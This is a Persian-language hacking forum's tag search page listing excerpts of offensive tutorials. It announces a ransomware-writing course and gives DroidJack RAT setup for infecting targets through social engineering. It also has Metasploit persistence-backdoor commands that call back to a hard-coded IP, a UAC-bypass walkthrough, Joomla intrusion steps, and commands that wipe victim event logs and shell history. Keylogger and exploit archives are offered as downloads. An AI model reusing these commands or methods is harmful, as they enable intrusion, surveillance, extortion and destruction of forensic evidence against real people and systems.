جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'آموزش هک'.
17 نتیجه پیدا شد
-
دوره باج افزار نویسی با پایتون
backpack پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
به نام خدا عرض سلام و خسته نباشید خدمت همگی دوستان و کاربران محترم. با عنایت خدا قراره که یه دوره باج افزار نویسی برای سیستم عامل ویندوز رو با زبان شیرین پایتون شروع کنیم. عزیزانی که می خوان تو این دوره با من همراه باشند باید به زبان پایتون تسلط کافی داشته باشند. دوره به دو بخش تقسیم میشه. 1- طراحی اسکلت باج افزار میایم یه باج افزار می نویسیم که فقط یه لیستی از پسوند ها رو انکریپت کنه، و کلید رو برای ما بفرسته، به همراه یه فایل دیکرپتور ساده. 2- ارتقا باج افزار نوشته شده کم کم این باج افزار خام رو ارتقا میدیم و اون رو تقویت می کنیم. پیشنیاز ها: 1- تسلط کامل بر روی زبان برنامه نویسی پایتون 2- آشنایی جزئی با ویندوز (اختیاری) 3- یک ویندوز مجازی موارد نصبی 1- پایتون3 2- ادیتور (بنده از VScode استفاده میکنم) اگر با ریجستری ویندوز آشنایی داشته باشید، کار تون در قسمت دوم دوره خیلی راحت میشه. در قسمت اول، از کتابخونه Cryptography استفاده میشه، اما اگر خدا بخواد تو قسمت دوم رمزنگاری پیچیده تر RSA رو پیاده سازی می کنیم. قوانین تاپیک 1- هیچ احدی، از ادمین گرفته تا کاربر تازه وارد، بدون هماهنگی در تاپیک پست نگذارید. 2- سوالات در این تاپیک پرسیده نمی شوند. برای پرسش سوال کلیک کنید. 3- در صورت داشتن سوال شخصی، انتقاد یا کمک در این زمینه کلیک کنید و پیام شخصی ارسال کنید. این جلسه: معرفی دوره + یک نمونه عملی: Guardiran.mp4 رفع مسئولیت تمام مسئولیت های استفاده از باج افزار بر عهده خود فرد میباشد و اینجانب هیچ گونه مسئولیتی در قبال استفاده نادرست از این بدافزار را ندارم و هرگونه پاسخگویی به ادعاهای مطرح شده توسط اشخاص حقیقی و حقوقی رد میشود و تیم امنیتی گاردایران هیچگونه مسئولیتی نسبت به آن ندارد. فهرست مطالب: قسمت اول - ویدیو معرفی قسمت اول - جلسه اول قسمت اول - جلسه دوم قسمت اول - جلسه سوم قسمت اول - جلسه چهارم ـــــــــــــــــــــــــــــــــــــــــ قسمت دوم - جلسه اول قسمت دوم - جلسه دوم قسمت دوم - جلسه سوم (جدید) مدت زمان دوره تا الان: 06 : 48 : 2 موفق باشید🌹 -
با سلام خدمت دوستان عزیز در این ویدئو که از مجموعه تست آسیب پذیری سایت ها بود ما کپچا دو سایت هاستینگ رو بررسی کردیم! سعی کردم تجربیاتم رو به خوبی انتقال بدم و به بهترین شکل ویدئو باشه. ( از بابت بالا بودن صدای اهنگ هم شرمنده ویدئوی بعدی حتما برطرف میشه) موفق و پیروز باشید.
-
- cpatcha
- check site
- (و 16 مورد دیگر)
-
لطفا در نظر سنجی قرار دادن ویدئوی تست و نفوذ وبسایت ها و کشف باگ که بیشتر سایت ها هست شرکت کنید.
- 4 پاسخ
-
- hacking training
- mr.msa
- (و 10 مورد دیگر)
-
با سلام خدمت دوستان عزیز ویدئوی جدید در رابطه با راه های کسب درآمد از هک و امنیت که خیلی ها علاقه دارن لینک سایت های استفاده شده : hackerone.com bugdasht.ir kolahsefid.org faradars.org faranesh.com toplearn.com maktabkhooneh.org exploit-db.com
-
به نام برنامه نویس هستی ♥! سلام دوستان با تاپیک جامع بات نت ها در خدمتتون هستم ../ در این تاپیک قرار هست انواع بات نت هارو با مشخصات براتون قرار بدم ../ برای دریافت اطلاعات درباره بات نت ها میتونید از این لینک استفاده کنید ../ لطفا به هیچ وجه اسپم ندید ../ ! در صورتی که براتون سوالی پیپش بیاد یا به بنده و یا به کاربران @R3dC0d3r @REX پیام خصوصی ارسال کنید../ با سپاس فراوان یا حـ ـق../ 2018/11/13
-
بسم الله الرحمن الرحيم ?جوملا? دوستان من توی این تاپیک میخوام در باره ی مبحث سایت و پیدا کردن حفره هاو باگ هایش و سپس اقدام به نفوذ صحبت کنم پس لطفا توجه کنید. جوملا امنیت نسبتا خوبی داره ، یعنی نمیشه گفت چون ما میتونیم بهش نفوذ کنیم ضعیف است و باگ های مسخره ای داره . خیلی از سایت های معتبر جهان مثل فروشگاه های اینترنتی از سایت جوملا ست من خودم چند وقت پیش ی سایت فروشگاه فرانسوی رو تونستم بهش نفوذ کنم دوستان من فقط بگم که ی موضوعی هست که باید همتون بدونید. اونم اینکه باید توی این جور آموزش ها جنبه داشته باشید یعنی اول برید کامل یاد بگیرید (ی دو سه ماهی مثلا فقط وقت بذارید واسه همین آموز ش )و بیگدار به آب نزنید دیگه نصیحتی نیست و خودتون باید مواظب باشید خوب برای پیدا کردن حفره های سایت های جوملا راه های متعددی هست. ولی بهترین برنامه و بهترین راه استفاده از اسکنر های موفق و قوی در این زمینه است اونم برنامه ای نیست جز برنامه ی JOOMSCAN این برنامه توی سیستم عامل های کالی لینوکس (اوبونتو) نصب هست ولی توی بکترک باید نصب کرد. خوب حالا توی کالی سرچ کنید joomscan سپس وقتی وارد محیط این ابزار شدید باید طبق دستور های زیر پیش بروید دستور : joomscan -u target.com تارگت نام سایت است حالا باید منتظر باشید اسکن شروع بشه . ببینید ی نکته ای که با ید بدونید اینکه مهم نیست چن تا حفره یا باگ به شما نشون میده بلکه نهم اینکه چنتا از اسکن ها با پاسخ yes است سپس باید یکی یکی تست کنید . یعنی اکسپلویت هایی که میده به شما را به آخر آدرس سایت جوملا توی مرورگر اضافه کنید . توی یکی از اونها پسورد هش وجود داره که باید با ابزار هایی که بعدا میگم نوع هش را پیدا کنید و سپس رمز گشایی کنید به همین راحتی در ضمن کسی هست بدون که چی دورکی در گوگل باید سرچ کرد که فقط سایت های جوملا رو بیراه؟ ??? تشکر فراموش نشه Worst_board ?
-
- آموزش کالی
- آموزش هک با کالی لینوکس
-
(و 24 مورد دیگر)
برچسب زده شده با :
- آموزش کالی
- آموزش هک با کالی لینوکس
- آموزش هک
- ابزار هک سایت joomla
- ابزار هک سایت جوملا
- ابزار هک سایت
- joomla
- hack joomla
- joomscan
- هک سایت
- هک جوملا
- اسکن سایت
- اسکن جوملا
- joomla scan
- آموزش هک سایت
- آموزش اسکن سایت
- هک سایت در کالی لینوکس
- پسورد هش
- رمز گشایی پسورد هش
- هک با joomscan
- scan site
- آموز هک
- آموزش نفوذ
- آموزش نفوذ به سایت
- ابزار های کالی لینوکس
- هک سایت راحت
-
معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه میباشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان میشود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانهای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز میگویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار میشود. علت این اشکالات میتواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخههایی تحت نام بتا یا آلفا انتشار میدهند تا افرادی آنها را بررسی کنند و این باگها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
-
- دفیس
- ip چیست؟
-
(و 43 مورد دیگر)
برچسب زده شده با :
- دفیس
- ip چیست؟
- آی پی چیست؟
- ip
- آی پی
- اکسپلویت چیست
- اکسپلویت
- پورت
- پورت چیست
- سی ام اس چیست
- cms چیست
- cms
- سی ام اس
- شل چیست
- شل چیست؟
- شل
- هک چیست
- باگ چیست
- باگ
- معنی هک
- هک چیست؟
- آموزش هک
- آموزش
- کلمات هک
- کلمات اختصاصی هک
- هک را از کجا باید آغاز کرد
- هک را از کجا باید آغاز کرد؟
- چگونه هکر شویم؟
- هکر
- چگونه هکر شویم
- از کجا هک را شروع کنیم
- شروع هک
- تازه واردها
- اصطلاحات هک برای تازه واردها
- اصطلاحات هک
- اصطلاح
- هک
- دفیس یعنی چه؟
- دفیس چیست؟
- مس دفیس
- مس دفیس چیست؟
- بایپس
- بایپس چیست؟
- bypass
- bypass چیست؟
-
با سلام خدمت همه اعضای گاردایران امروز میخوایم به آموزش کار با droidjack بپردازیم شاید خیلیاتون بلد باشین و کار کرده باشین اما یکم قلق داره اول این که به نظر من اگر با vps>انجام بدیم کار خیلی بهتر پیش میره و راحت تریم چونمشکل dnsو کمشدن امنیت و سرعت پایین اینترنت و درد سر شدن و..... رو نداریم و مهمتر اینکه خیلی وقتا همه چی هم درسته اما عمل نمیکنه پیگیر شدم دلیلش بن شدن اون از طرف شرکت های خدمات اینترنتی و دیتاسنتر ها بود..> بنظر من بهترین راه اینه که یه vps هلند بگیری خیلی روان و خوب کار میکنه و مشکل هم نداره چون دیتا سنتر های هلندی به اصتلاحوارز هستند و حساسیتی ندارند حالا میخوایم کارو شروع کنیم اول از همه باید فایروالو خاموش کنیم برای این کار در run..میزنیم "firewall.cpl" و بعد رو سربرگه بغلی که فک کنم اسمش این باشه "turn on windowsfirewall or on میریم و از اونجا دوتا قسمت رو خاموش می کنیم حالا بااید پورت باز کنیم برای این کار باید هم پورت tcp باز کنیم همudp برای این کار سرچ میکنیم firewall اولین گزینه میاد windows firewall روس کلیک می کنیم و به قسمت advance options میریم حالا از سربرگه inbound ruele میریم به منوی پورت ها حالا میزنیم رو سربرگه new rule میزنیم یه صفحه باز میشه بعد اونجا تیک رو روی port میزنیم در قسمت بعد شماره پورت رو انتخاب میکنیم tcp رو هم می زنیم بعدش بقیه اسم و توضیحات و... کامل می کنید بعد دوباره همون پورت با همون شماره فقط udp رو باز می کنید و تمام. حالا میرسه وقت به برنامه برنامه رو باز می کنیم تو قسمت genetate یه برنامه میسازیم یادتون باشه ای پی که ای پیه vps رو میدیم پورت هم که شماره پورت اسم و اینارو هم تنظیم می کنیم , l. و برنامه رو می سازیم حالا اونو با ترفند های مهندسی اجتمایی خودمون میدیم دست تارگت و اونطرف تو قسمت devices تارگتو پیدا میکنم و هر اطلاعاتی که بخوایم به راحتی شنو میکنیم #irblack در صورت مواجهه با مشکل>>>>>>>>>> telegram.me/irblack
-
- vhj fvhd l
- پیلود
- (و 13 مورد دیگر)
-
ساخت در پشتی Backdoor همیشگی و ماندگار
Mr.Python پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
سلام در این اموزش قصد داریم یک فایل بک دور که کریپت شده هست (مخفی ) رو به شما یاد بدیم . در پشتی یک روش cryptosystem یا algorithm در سیستم های کامپیوتری بشمار میاد که مکانیزم های امنیتی و احراز هویت نفوذ گر را غیرفعال میکنه. اجرای خودکار در هر boot سیستم که به دلیل کریپت بودن اون انتی ویروس ها و فایروال ها قادر به شناخت ان نیستند و بک دور به شکل یک برنامه اصلی سیستم در سیستم قربانی قرار میگیره ، یکی از ویژگی های بارز این ماژول قدرتمند هست. در این بخش ما با ماژول built in ( معنی »» ماژول های داخلی که قبلا ساخته شده ) به نام persistence در پوسته meterpreter ابزار متااسپلویت و نیز ماژول metsvc اشنا میشیم و در بخش بعدی خدا بخواد با ابزار veil یک فایل از سیستم قربانی رو الوده میکنیم همچنین اسکریپت backdoor در این ابزار . خب وقتی شما از سیستم قربانی دسترسی گرفتید (لازم نیست حتما دسترسی سیستمی باشه) میخواید بک دوری ایجاد کنید که اگر فایل تروجان شما به هر دلیلی پاک شد (شخص قربانی یا انتی ویروس یا ..) یا از کار افتاد یک فایل جایگزین داشته باشید که قابلیت های بیشتری داره مثل اجرای خودکار. بیاد داشته باشین با اجرای این ماژول پروسه حمله شما روی اون انتقال پیدا میکنه ( کار اصلی بک دور همینه) در پوسته meterpreter دستور زیر رو بنویسید تا توضیحات این ماژول برای شما نشون داده بشه : run persistence -h خب در اینجا من پارامتر ها و ارگومان های مهمی که شما برای این ابزار نیاز دارید مینویسم و در اخر مثال میزنم براتون: A- : اتصال خودکار در سیستم هدف . S- : اجازه ی اجرای خودکار به بک دور . U- : احرای خودکار بک دور بعد از هر boot سیستم (بک دور برای اینکار مدام تلاش میکند ) i- : مدت زمان تاخیری که در پشتی تلاش میکند دوباره به نفوذگر متصل شود (به ثانیه) P- : تعیین کننده نوع پیلود در هنگام متصل شدن به هدف . p- : تعیین شماره پورت که ابزار متااسپلویت به دنیال ان به گوش بایستد. r- : تعیین ای پی ادرس نفوذگر برای BackConnect .( جلوی این پارامتر از ای پی پابلیک خود یعنی ای پی که ISP به شما داده هم میتونید استفاده کنید اکر در سطح wan یعنی جهانی حمله رو پیاده سازی کردید نه محلی ، اگر حمله محلی باشه همون ای پی لوکال که داخل دستور ifconfig یا ipconfig هست رو استفاده کنید ) مفهوم back connect همین هست که شما یه اتصال دوباره به هدف داشته باشید ( دقیقا کاری که بک دور انجام میده) مثال ها : run persistence -U -A -X -p 443 -r 42.36.47.2 run persistence -A -L c:\\ -X 30 -p 443 -r 42.36.47.2 run persistence -U -A -i 10 - 8090 -r 42.36.47.2 ** دستورات در پوسته meterpreter نوشته میشن** ماژول دومم که ساده تره و میتونید help اونرو با دستور زیر ببینید: run metsvc -h بخش بعدی ساخت در پشتی با veil موفق باشید-
- ساخت در پشتی backdoor همیشگی و ماندگار
- ساخت بکدور دائمی
-
(و 13 مورد دیگر)
برچسب زده شده با :
- ساخت در پشتی backdoor همیشگی و ماندگار
- ساخت بکدور دائمی
- آموزش ساخت بکدور همیشگی
- ساخت بکدور همیشگی
- آموزش ساخت بکدور ثابت
- make a backdoor
- آموزش هک با بکدور
- maje a backdoor
- how make a fix backdoor
- آموزش تصویری ساخت بکدور
- آموزش فارسی ساخت بکدور
- آموزش هک وامنیت
- آموزش هک اندورید با بکدور
- آموزش هک با backdoor
- آموزش هک
-
پاکسازی ردپا
Mr.Python پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
سلام این اموزش زمانی کارسازه که شما قبلا uac رو بایپس کردید (در ویندوز های جدید) و سطح دسترسی سیستمی دارید برای ویرایش . خب در مورد ابزار veil که یکی از پروژه های قدرتمند در زمینه دور زدن انتی ویروس ها بشمار میاد ویا دیگر ابزار های دور زدن انتی ویروس ها صحبتی نمیکنم چرا که استاد بنده alizombie کامل و شفاف گفتن که در کتاب اموزش کالی لینوکس اموزش میدن و مطمئنم حتما اموزش جامع و روان هست پس برای این مورد میتونید به کتاب مراجعه کنید . اما در اینجا ما قصد داریم رد پاهایی که در log های سیستم قربانی داریم رو حذف کنیم تا از سوی متخصصین امنیت هم در امان بمانیم و لو نریم !! خوشبختانه این مرحله از حمله هم توسط ابزار متااسپلویت صورت میگیرد و در پوسته meterpreter پیاده سازی میشود . سه نمونهداز ماژول های built in رو مورد بررسی قرار میدیم که کارشون پاکسازی رد پاهاست و استفاده از هر کدام دلخواه است : ابتدا در پوسته meterpreter دستور زیر را بنویسید : irb حال مهمترین log هایی که باید از سیستم هدف پاک شوند را در داخل محیط irb مینویسیم و در اخر با متد clear تمام log ها پاک میشوند : log = client.sys.eventlog.open('system') log = client.sys.eventlog.open('security') log = client.sys.eventlog.open('application') log = client.sys.eventlog.open('directory service') log = client.sys.eventlog.open('dns server') log = client.sys.eventlog.open('file replication service') log.clear exit خب این از روش اول برای پاکسازی ردپاها. روش دوم فقط با فراخوانی ماژول clearev شروع و تمام میشود : clearev روش سوم به همین طریق : event_manager -c اگر به سیستم های لینوکسی حمله کردید تکنیک های دستی Manuel دیگری نیز برای پاکسازی رد پا وجود دارند مانند حذف محتویات فایل /var/log/messages و bash_history و ... more ~/.bash_history; echo $HISTSIZE; export HISTSIZE=0 shred -zu root/.bash_history دقت کنید که همه دستورات پاکسازی رد پا در پوسته meterpreter وارد شود و برای مورد اخر دستورات در ترمینال وارد میشود .-
- پاکسازی ردپا
- آموزش پاکسازی ردپا بعد از نفوذ
- (و 11 مورد دیگر)
-
بایپس UAC ویندوز ها ، سطح دسترسی سیستمی
Mr.Python پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
سلام برای بایپس UAC یکی از بهترین روش ها استفاده از ماژول های built in در متا اسپلویت هست. هنگامی که شما قصد دارید در ونیدوز 7 ,8, 10 ,.. سطح دسنرسی خود را به ' سیستم ' برسانید ممکن است با پیغام خطا موجه شوید . ماژولی که در باره ان صحبت میکنیم در دسته ماژول های محلی local قرار میگیرد یعنی پس از استفاده از یک ماژول remote و گرفتن دسترسی مناسب میتوان از این ماژول استفاده کرد: getuid use priv getsystem دستورات در پوسته meterpreter وارد میشوند. دستور getsystem که همان ماژولی هست که صحبت کردیم به طور حتم در ویندوز های xp و ویندوز سرور ها جوابگوست اما از ویندوز xp به بعد ویژگی جدیدی به نام UAC ظاهر شد که میتوانست از دستکاری های غیر مجاز جلوگیری کند . پس این ماژول در اینگونه ویندوز ها دارای خطاست مگر اینکه قبلا بایپس کرده باشید. ابتدا اطلاعات سطحی از سیستم قربانی میگیریم : run post/windows/gather/win_privs مشاهده میکنید که در قسمت is admin و یا is system کلمه false و در قسمت uac enabled کلمه true نوشته شده. ما از پوسته meterpreter برای مدتی خارج میشویم (منظور بستن نیست) و بعدماژول های بایپس uac را جستجو میکنیم که bypassuac_injection و bypassuac هستند .طریقه کار هر کدام بسته به ویندوز دارد ( 7 یا 8 یا 10) اگر با یکی جواب نگرفتید مطمئنا دومی جوابگوست . ضمنا با خارج شدن از پوسته شماره نشست session را بیاد داشته باشید: background search uac use exploit/windows/local/bypassuac show options در اینجا متغیر هایی که باید مقدار داده شوند نشان داده خواهد شد . set payload windows/meterpreter/reverse_TCP set LHOST IP set LPORT port set SESSION number set TARGET 0 or 1 خب شماره نشست رو که در قسمت مربوطه وارد کنید شماره target هم برای معماری سیستم طرف هست که اونم داخل show options نوشته شده. در نهایت دستور exploit پیلود بایپس در سیستم اپلود و اجرا میشود و از طریق همان پیلود سطح دسترسی سیستمی اکسپلویت (بهره برداری) میشود. و حالا ماژول getsystem برای انجام این عمل : getsystem برای اطمینان ماژول win_priv را دوباره اجرا کنید: run post/windows/gather/win_priv مقدار is admin و is system برابر true و مقدار uac enabled برابر false قرار داده شده. میتوانید ماژول getuid را فرا بخوانید و ببینید که PE به شما داده شده! getuid خروجی : NT AUTHORITY/SYSTEM حال شما ادمین کلاینت هستید . راه دیگر هم هست به اسم steal token که زیاد مناسب ورژن های جدید ویندوز نیست بیشتر در xp استفاده میشه اونم برا نشان جعلیو افزایش سطح دسترسی که راحتتره و اگر getsystem به دلایل نادری جواب نداد از این روش در xp و ویندوز سرور استفاده میشه.-
- آموزش بایپس uac ویندوز ها
- آموزش بایپس سطح دسترسی سیستمی
- (و 8 مورد دیگر)
-
آموزش باگ Xpatch injection
1TED پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
درود ../ با آموزش هک سایت با باگ Xpatch injection در خدمتتون هتسیم رمز فایل فشرده : guardiran.org فایل Help +Exploit پیوست شد یا حـ ـق ../ xpatch injection.rar exploit+help.rar -
آموزش هک سایت باگ XSS
sezar1370 پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت کاربران گارد ایران. این روش هک نیست البته از نظره بنده فقط جنبه آموزش داره. امید وارم خوشتون بیاد آموزش.zip -
ازمنوی اصلی گوشی نمادبرنامه contacts را پیدا کنید و انتخاب کنید و فعال کنید . به ترتیب options—new contact را انتخاب کنید متن پیام مورد نظر را در فیلد اول first name تایپ کنید سایر فیلد ها را خالی بزارید گزینهdone را انتخاب کنید . حالا متن پیام حمله کننده به عنوان یکی از مدخلها در دفتر چه تلفن شماثبت می شه نام مدخل را انتخاب کنید و به ترتیب options—sent—via bluetooth را انتخاب کنید گزینه more devices را انتخاب کنید و گزینه selectرا انتخاب کنید پیامی که نوشته اید به عنوان یک پیام بلوتوث ناشناس به سوی قربانی ارسال می شه و قربانی جز اینکه پیام را قبول کنه و هک شود راهی دیگر نداره. و نکته اخر:هیچ وقت بلوتوث خود را در مکان های عمومی روشن نگذارید
-
با سلام و عرض ادب آموزش زبان برنامه نویسی به زبان ++c باتشکر از دوست و استاد عزیزم *diamond*که منو راهنمایی کردن رمز فایل ها : guardiran.org موفق و پیروز باشید C++.part1.rar C++.part2.rar
-
- برنامه نویسی
- چگونه برنامه بنویسیم؟
- (و 6 مورد دیگر)
-
کیلاگر قدرتمند MasterKey Keylogger به همراه عکس ..... موفق باشید masterkey.rar
-
- آموزش هک
- آموزش ساخت فیک پیج
-
(و 3 مورد دیگر)
برچسب زده شده با :